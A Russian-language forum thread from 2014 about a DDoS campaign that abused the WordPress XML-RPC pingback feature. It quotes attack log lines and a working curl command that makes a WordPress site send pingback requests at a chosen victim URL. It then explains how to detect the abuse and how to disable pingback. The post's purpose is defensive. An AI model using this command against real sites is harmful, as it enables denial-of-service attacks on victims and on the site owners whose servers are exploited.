Ответ
Хакеры используют WordPress для DDoS Опции темы
Старый 12.03.2014, 19:41
  #1
Матрос
 
Аватар для Матрос
Регистрация: 26.03.2011
Сообщений: 1,370

Хакеры используют WordPress для DDoS
Всем привет, давно ничего не писал, но вот попала на глаза интересная информация, хочу поделиться с теми кто использует WordPress платформу для своих сайтов. Самая популярная платформа для сайтов CMS WordPress до недавнего времени считалась самой неуязвимой. Но события произошедшие на днях опровергли это мнение.





Группой хакеров была обнаружена серьезная уязвимость в коде платформы, которая позволила использовать невинные сайты в проведении полномасштабной DDoS атаки.

Недавно им удалось "завербовать" таким образом 162000 вполне законопослушных сайтов в роль инструментов своих не вполне законных действий. Стоит ли говорить что Distributed Denial of Service (DDOS) атаки – это бич Интернета в эпоху широкополосных каналов и неограниченного доступа.

Любой WordPress сайт с отключенным Pingback может быть использован в DDOS атаках против других сайтов.

Все началось с того, что один популярный сайт на такой же платформе WordPress был «положен» из-за многочасовой DDOS атаки. Когда интенсивность атаки начала усиливаться, клиент выключил сайт и обратился за помощью к специалистам. После того как перенесли DNS, они увидели большую http-ориентированную атаку на сервер, которая выглядела следующим образом
74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"
121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com" 
217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr" 
193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de"
..
Как можно заметить, все присланные запросы имели случайное значение в аргументе - например "?4137049= 643182", что выключало использование кэша и принудительно заставляло страницу выполнять каждый раз полную перезагрузку, что и "убивало" сервер в очень короткое время.
Но самое интересное, что все эти запросы приходили от реальных и вполне законных сайтов на базе WordPress. Такой атаки одних только WordPress-ов что уложили сервера в одно мгновение, еще не было никогда.
"Вы видите , насколько мощным может быть DDoS атака? ", сказал технический директор Sucuri Даниэль Сид. " Один злоумышленник может использовать тысячи популярных и чистых ресурсов на WordPress для выполнения своей DDOS атаки, не выходя из тени, и все происходит через простой ping back запрос к файлу XML-RPC ".

$ curl -D -  "www.anywordpresssite.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.com/postchosen</string></value></param></params></methodCall>'
Да, это простая команда на Linux, которую может запустить любой желающий.

Сид утверждает, что команда WordPress знает о проблеме, но даже не планирует исправлять ее, так как это вызовет массовый отказ работы многих популярных плагинов.

Я знаю, что тут у многих сайты на базе WordPress, и у многих возникнет вопрос "как узнать участвует ли мой сайт в DDoS атаке?". Это сделать не так уж сложно. Для начала, правда, придется научиться читать логи сервера. Это умение не раз сыграет вам службу. В первую очередь ищите любые POST запросы к своему XML-RPC file. Типа вот таких:
93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:<?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?>\x0A<methodCall>\x0A<methodName>pingback.ping</methodName>\x0A<params>\x0A <param>\x0A  <value>\x0A   <string>http://fastbet99.com/?1698491=8940641</string>\x0A  </value>\x0A </param>\x0A <param>\x0A  <value>\x0A   <string>yoursite.com</string>\x0A  </value>\x0A </param>\x0A</params>\x0A</methodCall>\x0A"

94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"
Если они есть – знайте что ваш сайт одна из цепочек массированной DDoS атаки. Строчки из примера были на сайтах что участвовали в DDoS на fastbet99.com и guttercleanerlondon.co.uk.

Чтобы остановить злоупотребление уязвимостью своего сайта на WordPress, необходимо избавиться от XML-RPC (Pingback) функциональности. Для этого можно удалить файл, xmlrpc.php, но надо учитывать, что при любом обновлении этот сайт будет восстановлен. Или второй более цивилизованный способ - дописать в functions.php код, который создаст нужный фильтр:

add_filter( ‘xmlrpc_methods’, function( $methods ) {
   unset( $methods['pingback.ping'] );
   return $methods;
} );
Эти способы помогут защититься от неправомерного использования вашего сайта. Ну и не пожалейте времени, чтобы узнать замешан ли ваш сайт в DDoS атаках с помощью услуги WordPress DDOS сканер




Нравится 0   Не нравится 0
Пожаловаться на это сообщение 0  
Ответить с цитированием
Старый 12.03.2014, 20:50
  #2
P1otr
 
Регистрация: 12.09.2012
Сообщений: 1,447

Спасибо Саня, очень полезный пост.
Нравится 0   Не нравится 0
Пожаловаться на это сообщение 0  
Ответить с цитированием
Старый 13.03.2014, 11:27
  #3
Матрос
 
Аватар для Матрос
Регистрация: 26.03.2011
Сообщений: 1,370

На здоровье. Как показывает практика - любую платформу надо защищать и постоянно держать оборону в тонусе
Нравится 0   Не нравится 0
Пожаловаться на это сообщение 0  
Ответить с цитированием

Ответ
 
 

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В истории Интернета отмечен самый мощный DDoS Steam Сервисы 9 12.02.2014 20:36
Wordpress на варезник Benjamin C Вопросы 14 05.01.2014 15:59
Онлайн редактор тем для WordPress 0pium Хостинг 2 29.08.2012 00:08
Создание сайта на WordPress Incanta Статьи 31 27.07.2012 06:54
Вирус WordPress 2012 Xenolith Оффтоп 0 15.04.2012 14:04

Метки
ddos, wordpress, взлом, уязвимости


Здесь присутствуют: 1 (пользователей: 0, гостей: 1)
 
Опции темы

Быстрый переход


Текущее время: 11:59. Часовой пояс GMT +3.